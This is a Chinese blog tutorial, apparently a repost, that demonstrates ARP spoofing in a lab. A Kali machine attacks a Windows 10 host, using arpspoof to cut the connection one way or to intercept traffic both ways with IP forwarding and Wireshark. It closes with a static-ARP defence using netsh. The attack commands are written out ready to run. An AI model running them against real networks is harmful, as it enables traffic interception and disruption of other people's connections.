当前位置:   article > 正文

工作组&局域网-ARP欺骗-攻击防御&单双向

工作组&局域网-ARP欺骗-攻击防御&单双向

免责声明:本文仅做技术交流与学习...

目录

断网限制-单向

环境:

演示:

win10:

欺骗前

欺骗后

kali:

kali执行命令:

win10结果:

劫持数据-双向

 欺骗:

网络分析:

防御--动态解析改静态


中间人攻击

断网限制-单向

环境:

靶机:win10

攻击机:kali

演示:

win10:

欺骗前

欺骗后

kali:


kali执行命令:

  1. arpspoof -i eth0 -t 192.168.127.128 -r 192.168.127.2
  2. -i 指定进行 arp 攻击的网卡
  3. -t 目标主机 IP (靶机)
  4. -r 目标网关的 IP 地址


win10结果:

 


劫持数据-双向

同上面的单向一样,就是多了个转发,放行网络.

 欺骗:

  1. 开启转发:
  2. (Linux下:)
  3. echo 1 >> /proc/sys/net/ipv4/ip_forward
  4. 1为转发
  5. 0为不转发
  6. 开启欺骗:
  7. arpspoof -i eth0 -t 192.168.127.128 -r 192.168.127.2
  8. -i 指定进行 arp 攻击的网卡
  9. -t 目标主机 IP (靶机)
  10. -r 目标网关的 IP 地址
  11. 网络分析:
  12. wireshark&科来

网络分析

 


防御--动态解析改静态

win10:

  1. arp -a
  2. netsh i i show in
  3. #记录网卡的idx值
  4. #修改命令:
  5. netsh -c i i add neighbors 14 192.168.127.2 00-50-56-e3-44-05
  6. netsh -c i i add neighbors <idx值> <靶机网关IP> <靶机MAC地址>

 


声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/736713?site
推荐阅读
相关标签
  

闽ICP备14008679号